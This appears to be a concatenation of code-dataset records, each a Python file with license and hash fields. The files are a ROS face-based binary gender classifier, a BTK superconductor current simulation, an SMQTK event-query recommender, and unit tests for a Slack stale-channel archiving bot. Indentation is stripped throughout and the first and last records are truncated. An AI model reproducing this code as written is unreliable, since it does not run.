from approach_control_people.faces.load_database import load_female_db as female_db
from approach_control_people.faces.load_database import load_male_db as male_db
class GenderDiscover(smach.State):
def __init__(self):
smach.State.__init__(self, outcomes=['woman', 'man', 'fail'])
self.face_cascade = cv2.CascadeClassifier('/usr/local/share/OpenCV/haarcascades/haarcascade_frontalface_default.xml')
self.bridge = CvBridge()
self.GRID = 16
self.SIZE = 128
self.m = Map('Regions')
self.m.MakeRegularCluster(self.SIZE, self.SIZE, self.GRID, self.GRID)
self.m.MakeRegions()
self.ulbp_face = ULBP(self.m)
self.ulbp_female = ULBP(self.m)
self.ulbp_male = ULBP(self.m)
self.ulbp_male.MakePattern(male_db())
self.ulbp_male.MakeHistogram()
self.ulbp_female.MakePattern(female_db())
self.ulbp_female.MakeHistogram()
self.gender = None
def is_woman(self, img):
self.ulbp_face.MakePattern(img)
self.ulbp_face.MakeHistogram()
return Authentify(self.ulbp_face.histogram, self.ulbp_female.histogram, self.ulbp_male.histogram, W) > 20.0
def callback(self, data):
try:
image = self.bridge.imgmsg_to_cv2(data, 'bgr8')
except CvBridgeError as e:
rospy.logerr(e)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
roi_gray = None
faces = self.face_cascade.detectMultiScale(
gray,
scaleFactor = 1.1,
minNeighbors = 10,
minSize = (100,100),
flags = cv2.cv.CV_HAAR_SCALE_IMAGE
)
for (x, y, w, h) in faces:
x1 = x + int(w * .1)
x2 = x1 + int(w * .8)
y1 = y + int(h * .2)
y2 = y1 + int(h * .8)
roi_gray = cv2.resize(gray[y1:y2, x1:x2], (128, 128))
self.gender = 'man'
if self.is_woman(roi_gray):
self.gender = 'woman'
def execute(self, userdata):
rospy.Subscriber('/image_raw', Image, self.callback)
rospy.sleep(5)
if self.gender is not None:
return self.gender
else:
return 'fail' | gpl-2.0 | -3,593,615,707,399,300,000 | 24.098901 | 119 | 0.700394 | false |
jithinbp/BTK_simulations | current_fermi.py | 1 | 2141 | import math
import pygrace
import pygame,os,time,sys
WIDTH=400
HEIGHT=100
size = [WIDTH,HEIGHT]
flags=pygame.SRCALPHA|pygame.HWSURFACE|pygame.HWACCEL
os.environ['SDL_VIDEO_WINDOW_POS'] = '700,100'
screen = pygame.display.set_mode(size,flags)
pygame.display.set_caption("Transmission and reflection")
def xmgrace():
global pg
try:
import pygrace
except:
print 'damn'
return
pg = pygrace.grace()
pg.xlabel('V -->>')
pg.ylabel('I -->')
pg.title('Current')
#globals
ev=1.6e-19
k=1#8.617e-5
delta=2*0.001
T=5.0/11605.0 #temperature in eV 1ev=11605k
z=1.0 #Barrier strength at the interface
#general form
def gamma2(u2):
return (u2+z*z*(2*u2-1) )**2
def u2(E):
return 0.5*(1+math.sqrt((E**2-delta**2)/(E**2)) )
def PA(E): #probability of andreev reflection
if E<delta:
t2=E*E + (delta*delta-E*E)*( (1+2*z*z)**2 )
return (delta*delta)/t2
else:
u=u2(E)
return u*(1-u)/gamma2(u)
def PB(E): #probability of ordinary reflection
if E<delta:
return 1-PA(E)
else:
u=u2(E)
return (2*u-1)*(2*u-1)*(1+z*z)*z*z/gamma2(u)
def fermi_fn(E):
#print 'E,k*T, E/(k*T) = ',E,k*T,E/(k*T)
x= 1.0/(math.exp(E/(T))+1)
return x
def integ(E,V):
x=(fermi_fn(E-V)-fermi_fn(E))*(1+PA(E)-PB(E))
return x
def current(V):
#integrate between reasonable limits ( not -inf to +inf )
I=0
dE=1.0e-3
E=0
while E<0.3:
Im=integ(E,V)*(dE)
Ip=integ(-E,V)*(dE)
I+=Im+Ip
E+=dE
#print 'E,I= ',E,I
return I
xmgrace()
pg.hold(1)
dump=open('TandR_Z0.txt','wt')
#XMGRACE PLOT FEATURES
# A=Black , B=red , C in green , D in Blue
def refresh(z):
pg.xlabel('E (Z = %2.2f) -->'%(z))
pg.clear()
pg.hold(1)
dump=open('I.txt','wt')
y=[]
x=[]
V=0
dV=1e-5
while V<3e-3:
j=V
g=current(V)
V+=dV
if(j):
#print j,g
x.append(j)
y.append(g)
dump.write('%f %f\n'%(j,g) )
pg.plot(x,y)
dump.write('\n')
dump.close()
ll=0
refresh(z)
run=True
while run:
event=pygame.event.wait()
if event.type == pygame.QUIT:
try:
pg.exit()
run=False
except:
sys.exit()
ll=0
try:
ll=event.button
if(ll==4):z+=0.1
elif (ll==5): z-=0.1
if z<0: z=0
except:
continue
if(ll):refresh(z)
| gpl-3.0 | 8,471,243,037,193,875,000 | 14.977612 | 58 | 0.609061 | false |
anguoyang/SMQTK | OLD_ROOT/WebUI/QueryRecommend/query_recommend.py | 1 | 7183 | """
LICENCE
-------
Copyright 2013 by Kitware, Inc. All Rights Reserved. Please refer to
KITWARE_LICENSE.TXT for licensing information, or contact General Counsel,
Kitware, Inc., 28 Corporate Drive, Clifton Park, NY 12065.
"""
import os
import numpy as np
import json
thispath = os.path.dirname(os.path.abspath(__file__))
# commonly used words in event descriptions
additional_stop_words = ['event', 'name', 'explication', 'evidential', 'description', 'scene',
'objects', 'people', 'activities', 'audio']
# zero-shot queries for E006 ~ E015
queries = dict()
queries['E000'] = ''
queries['E006'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting sc.has_audience sc.congregating' \
' ob.light_source ob.person'
queries['E007'] = 'sc.transporting sc.manmade sc.using_tools sc.asphalt ob.round_shape ob.car'
queries['E008'] = 'sc.congregating sc.has_audience ob.person sc.pavement' \
' ob.large_group_of_people ob.crowd ob.small_group_of_people ob.railing ob.floor'
queries['E009'] = 'sc.dirty sc.natural_light sc.natural ob.large_open_area sc.sunny sc.trees' \
' ob.truck ob.car ob.large_open_area ob.outdoor'
queries['E010'] = 'sc.working sc.dirty sc.enclosed_area'
queries['E011'] = 'sc.enclosed_area sc.wood_not_part_of_tree sc.electric_or_indoor_lighting'
queries['E012'] = 'sc.congregating sc.has_audience sc.asphalt sc.pavement' \
' ob.person ob.large_group_of_people ob.tree ob.sports_venue ob.crowd' \
' ob.small_group_of_people ob.railing ob.floor'
queries['E013'] = 'sc.asphalt sc.trees sc.natural_light sc.open_area' \
' ob.large_open_area ob.tree ob.rectangular_shape ob.door'
queries['E014'] = 'sc.using_tools sc.working sc.learning ob.round_shape'
queries['E015'] = 'sc.person sc.enclosed_area sc.electric_or_indoor_lighting'
queries['E021'] = 'sc.trees sc.vegetation sc.natural sc.open_area sc.pavement sc.asphalt sc.natural_light' \
' ob.tree ob.large_open_area ob.cloud ob.outdoor ob.sports_venue ob.sky ob.truck '
queries['E022'] = 'sc.learning sc.working sc.enclosed_area sc.dirty sc.using_tools sc.electric_or_indoor_lighting'
queries['E023'] = 'sc.asphalt sc.pavement sc.clouds' \
' ob.cloud ob.small_group_of_people ob.floor ob.sports_venue ob.railing'
queries['E024'] = 'sc.transporting sc.asphalt sc.trees sc.pavement ob.rectangular_shape ob.door'
queries['E025'] = 'sc.person ob.small_group_of_people ob.vertical_pattern'
queries['E026'] = 'sc.wood_not_part_of_tree sc.enclosed_area sc.working sc.using_tools sc.dirty' \
' ob.door ob.vertical_pattern ob.rectangular_shape ob.railing '
queries['E027'] = 'sc.natural sc.dirty sc.open_area sc.trees sc.natural_light' \
' ob.large_group_of_people ob.tree ob.outdoor ob.vertical_pattern ob.crowd ob.person '
queries['E028'] = 'sc.person sc.has_audience sc.enclosed_area ob.rectangular_shape ob.crowd'
queries['E029'] = 'sc.sunny sc.still_water sc.open_area sc.pavement sc.trees sc.manmade sc.asphalt' \
' ob.large_open_area ob.sports_venue ob.outdoor ob.horizontal_pattern'
queries['E030'] = 'sc.using_tools sc.working sc.dirty ob.railing ob.floor ob.face'
def read_words(_words):
words = []
with open(_words, 'r') as fid_stop_words:
for line in fid_stop_words:
if line[-1]=='\n':
line = line[:-1]
if line != '':
words.append(line)
return words
def preprocess(string, stop_words=None, special_char=None):
if stop_words is None:
_stop = thispath + '/stop_words.txt'
stop_words = read_words(_stop)
if special_char is None:
_special = thispath + '/special_characters.txt'
special_char = read_words(_special)
string = string.lower()
string = string.replace('\n', ' ')
string = string.replace('\t', ' ')
for schar in special_char:
string = string.replace(schar.decode("utf8"), '')
words = string.split(' ')
words_out = []
for w in words:
if not (w in stop_words) and len(w) > 0:
words_out.append(w)
return words_out
def generate_bow(string, dictionary):
bow = np.zeros(len(dictionary))
words = preprocess(string)
for w in words:
try:
bow[dictionary[w]] += 1
except KeyError:
# A word doesn't exist in the dictionary, so ignore it.
continue
if np.sum(bow) > 0:
bow /= np.sum(bow)
return bow
def build_dictionary():
_stop = thispath + '/stop_words.txt'
_special = thispath + '/special_characters.txt'
stop_words = read_words(_stop) + additional_stop_words
special_char = read_words(_special)
words = []
for eid in range(6, 16) + range(21, 31):
string = ""
with open('./eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
words += preprocess(string, stop_words, special_char)
words = sorted(list(set(words)))
dictionary = dict()
for idx, w in enumerate(words):
dictionary[w] = idx
np.save('dictionary_event_description.npy', dictionary)
def generate_event_bow():
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
for eid in range(6, 16) + range(21, 31):
string = ""
with open(thispath + '/eventtexts/E%03d.txt' % eid, 'r') as fid_event:
for line in fid_event:
string += line
bow_eid = generate_bow(string, dictionary)
np.save(thispath + '/eventbow/E%03d.npy' % eid, bow_eid)
def recommend_query(string):
'''
Return zero-shot queries based on event description
@param string: Event description in a string format
@return: Queries in a string format
'''
dictionary = np.load(thispath + '/dictionary_event_description.npy').item()
bow = generate_bow(string, dictionary)
min_dist = 1
detected_eid = 0 # if description matching fails, it will return an empty query.
for eid in range(6, 16) + range(21, 31):
bow_eid = np.load(thispath + '/eventbow/E%03d.npy' % eid)
dist = np.sqrt(np.sum((bow - bow_eid)**2))
if min_dist > dist:
min_dist = dist
detected_eid = eid
return queries['E%03d' % detected_eid]
if __name__ == '__main__':
# build_dictionary()
# generate_event_bow()
string = 'AExplication: Bikes are normally ridden with a person sitting down on ' \
'seat and holding onto the handlebars and steering with their hands. ' \
'Tricks consist of difficult ways of riding the bike, such as on ' \
'one wheel, steering with feet or standing on the seat; or intentional ' \
'motions made with the bike that are not simply slowing down/stopping ' \
'the bike, propelling it forward, or steering the bike as it'
q = recommend_query(string)
print q
| bsd-3-clause | 2,104,360,600,271,689,500 | 42.067485 | 114 | 0.622442 | false |
rossrader/destalinator | tests/test_destalinator.py | 1 | 25539 | from datetime import date, datetime, timedelta
import mock
import os
import unittest
import destalinator
import slacker
import slackbot
sample_slack_messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Human human human.",
"ts": "1355517523.000005",
"edited": {
"user": "U2147483697",
"ts": "1355517536.000001"
}
},
{
"type": "message",
"subtype": "bot_message",
"text": "Robot robot robot.",
"ts": "1403051575.000407",
"user": "U023BEAD1"
},
{
"type": "message",
"subtype": "channel_name",
"text": "#stalin has been renamed <C2147483705|khrushchev>",
"ts": "1403051575.000407",
"user": "U023BECGF"
},
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": "Contemplating existence.",
"ts": "1355517523.000005"
},
{
"type": "message",
"subtype": "bot_message",
"attachments": [
{
"fallback": "Required plain-text summary of the attachment.",
"color": "#36a64f",
"pretext": "Optional text that appears above the attachment block",
"author_name": "Bobby Tables",
"author_link": "http://flickr.com/bobby/",
"author_icon": "http://flickr.com/icons/bobby.jpg",
"title": "Slack API Documentation",
"title_link": "https://api.slack.com/",
"text": "Optional text that appears within the attachment",
"fields": [
{
"title": "Priority",
"value": "High",
"short": False
}
],
"image_url": "http://my-website.com/path/to/image.jpg",
"thumb_url": "http://example.com/path/to/thumb.png",
"footer": "Slack API",
"footer_icon": "https://platform.slack-edge.com/img/default_application_icon.png",
"ts": 123456789
}
],
"ts": "1403051575.000407",
"user": "U023BEAD1"
}
]
sample_warning_messages = [
{
"user": "U023BCDA1",
"text":"This is a channel warning! Put on your helmets!",
"username":"bot",
"bot_id":"B0T8EDVLY",
"attachments": [{"fallback":"channel_warning", "id": 1}],
"type":"message",
"subtype":"bot_message",
"ts":"1496855882.185855"
}
]
class MockValidator(object):
def __init__(self, validator):
# validator is a function that takes a single argument and returns a bool.
self.validator = validator
def __eq__(self, other):
return bool(self.validator(other))
class SlackerMock(slacker.Slacker):
def get_users(self):
pass
def get_channels(self):
pass
class DestalinatorChannelMarkupTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_multiple(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general multiple #general channel #general references."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> multiple <#ABC123|general> channel <#ABC123|general> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_hyphens(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #channel-with-hyphens references."
mock_slacker.add_channel_markup.return_value = "<#EXA456|channel-with-hyphens>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#EXA456|channel-with-hyphens> references."
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_add_slack_channel_markup_ignore_screaming(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
input_text = "Please find my #general channel reference and ignore my #HASHTAGSCREAMING thanks."
mock_slacker.add_channel_markup.return_value = "<#ABC123|general>"
self.assertEqual(
self.destalinator.add_slack_channel_markup(input_text),
"Please find my <#ABC123|general> channel reference and ignore my #HASHTAGSCREAMING thanks."
)
class DestalinatorChannelMinimumAgeTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_old(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 60}
self.assertTrue(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_exactly_expected_age(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 30}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_channel_is_young(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 86400 * 1}
self.assertFalse(self.destalinator.channel_minimum_age("testing", 30))
target_archive_date = date.today() + timedelta(days=10)
target_archive_date_string = target_archive_date.isoformat()
class DestalinatorGetEarliestArchiveDateTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch.dict(os.environ, {'EARLIEST_ARCHIVE_DATE': target_archive_date_string})
def test_env_var_name_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = 'EARLIEST_ARCHIVE_DATE'
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_archive_date_set_in_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = target_archive_date_string
self.assertEqual(self.destalinator.get_earliest_archive_date(), target_archive_date)
def test_falls_back_to_past_date(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['earliest_archive_date_env_varname'] = None
self.destalinator.config.config['earliest_archive_date'] = None
self.assertEqual(
self.destalinator.get_earliest_archive_date(),
datetime.strptime(destalinator.PAST_DATE_STRING, "%Y-%m-%d").date()
)
class DestalinatorGetMessagesTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_default_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(len(self.destalinator.get_messages("general", 30)), len(sample_slack_messages))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_empty_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = []
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum('subtype' not in m for m in sample_slack_messages)
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_limited_included_subtypes(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['included_subtypes'] = ['bot_message']
mock_slacker.get_channelid.return_value = "123456"
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.assertEqual(
len(self.destalinator.get_messages("general", 30)),
sum(m.get('subtype', None) in (None, 'bot_message') for m in sample_slack_messages)
)
class DestalinatorGetStaleChannelsTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_default_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 0)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_no_stale_channels_but_all_minimum_age_with_specific_ignore_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertEqual(len(self.destalinator.get_stale_channels(30)), 2)
class DestalinatorIgnoreChannelTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
def test_with_explicit_ignore_channel(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_matching_ignore_channel_pattern(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^stal']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_non_mathing_ignore_channel_pattern(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len']
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
def test_with_many_matching_ignore_channel_patterns(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channel_patterns'] = ['^len', 'lin', '^st']
self.assertTrue(self.destalinator.ignore_channel('stalinists'))
def test_with_empty_ignore_channel_config(self):
self.destalinator = destalinator.Destalinator(self.slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = []
self.destalinator.config.config['ignore_channel_patterns'] = []
self.assertFalse(self.destalinator.ignore_channel('stalinists'))
class DestalinatorStaleTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_sample_messages(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertFalse(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_all_users_ignored(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_users'] = [m['user'] for m in sample_slack_messages if m.get('user')]
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=sample_slack_messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_a_dolphin_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
messages = [
{
"type": "message",
"channel": "C2147483705",
"user": "U2147483697",
"text": ":dolphin:",
"ts": "1355517523.000005"
}
]
self.destalinator.get_messages = mock.MagicMock(return_value=messages)
self.assertTrue(self.destalinator.stale('stalinists', 30))
@mock.patch('tests.test_destalinator.SlackerMock')
def test_with_only_an_attachment_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.get_channel_info.return_value = {'age': 60 * 86400}
self.destalinator.get_messages = mock.MagicMock(return_value=[m for m in sample_slack_messages if 'attachments' in m])
self.assertFalse(self.destalinator.stale('stalinists', 30))
class DestalinatorArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_ignored_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.config.config['ignore_channels'] = ['stalinists']
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_when_destalinator_not_activated(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=False)
mock_slacker.post_message.return_value = {}
self.destalinator.archive("stalinists")
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_closure_with_closure_text(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.get_channel_member_names.return_value = ['sridhar', 'jane']
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', mock.ANY, message_type='channel_archive'),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_announces_members_at_channel_closing(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
names = ['sridhar', 'jane']
mock_slacker.get_channel_member_names.return_value = names
self.destalinator.archive("stalinists")
self.assertIn(
mock.call('stalinists', MockValidator(lambda s: all(name in s for name in names)), message_type=mock.ANY),
mock_slacker.post_message.mock_calls
)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
self.destalinator.archive("stalinists")
mock_slacker.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_channel_with_only_restricted_users(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
mock_slacker.archive.return_value = {'ok': True}
mock_slacker.channel_has_only_restricted_members.return_value = True
self.destalinator.safe_archive("stalinists")
self.assertFalse(mock_slacker.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_skips_archiving_if_before_earliest_archive_date(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
today = date.today()
self.destalinator.earliest_archive_date = today.replace(day=today.day + 1)
self.destalinator.safe_archive("stalinists")
self.assertFalse(self.destalinator.archive.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_archive_method(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.post_message.return_value = {}
self.destalinator.archive = mock.MagicMock(return_value=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.safe_archive("stalinists")
self.destalinator.archive.assert_called_once_with('stalinists')
class DestalinatorSafeArchiveAllTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_calls_stale_once_for_each_channel(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
self.destalinator.stale = mock.MagicMock(return_value=False)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive_all(days)
self.assertEqual(self.destalinator.stale.mock_calls, [mock.call('leninists', days), mock.call('stalinists', days)])
@mock.patch('tests.test_destalinator.SlackerMock')
def test_only_archives_stale_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
days = self.destalinator.config.archive_threshold
self.destalinator.safe_archive = mock.MagicMock()
self.destalinator.safe_archive_all(days)
self.destalinator.safe_archive.assert_called_once_with('leninists')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_archive_ignored_channels(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
self.destalinator.config.config['ignore_channels'] = ['leninists']
mock_slacker.channels_by_name = {'leninists': {'id': 'ABC4321'}, 'stalinists': {'id': 'ABC4321'}}
def fake_stale(channel, days):
return {'leninists': True, 'stalinists': False}[channel]
self.destalinator.stale = mock.MagicMock(side_effect=fake_stale)
mock_slacker.channel_has_only_restricted_members.return_value = False
self.destalinator.earliest_archive_date = date.today()
self.destalinator.safe_archive_all(self.destalinator.config.archive_threshold)
self.assertFalse(mock_slacker.archive.called)
class DestalinatorWarnTestCase(unittest.TestCase):
def setUp(self):
self.slacker = SlackerMock("testing", "token")
self.slackbot = slackbot.Slackbot("testing", "token")
@mock.patch('tests.test_destalinator.SlackerMock')
def test_warns_by_posting_message(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = sample_slack_messages
self.destalinator.warn("stalinists", 30)
mock_slacker.post_message.assert_called_with("stalinists", self.destalinator.warning_text, message_type='channel_warning')
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text,
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
@mock.patch('tests.test_destalinator.SlackerMock')
def test_does_not_warn_when_previous_warning_with_changed_text_found(self, mock_slacker):
self.destalinator = destalinator.Destalinator(mock_slacker, self.slackbot, activated=True)
mock_slacker.channel_has_only_restricted_members.return_value = False
mock_slacker.get_messages_in_time_range.return_value = [
{
"text": self.destalinator.warning_text + "Some new stuff",
"user": "ABC123",
"attachments": [{"fallback": "channel_warning"}]
}
]
self.destalinator.warn("stalinists", 30)
self.assertFalse(mock_slacker.post_message.called)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 9,137,686,970,157,095,000 | 48.113462 | 130 | 0.673519 | false |
UpOut/UpOutDF | test.py | 1 | 2268 | from upoutdf.parse import get_class
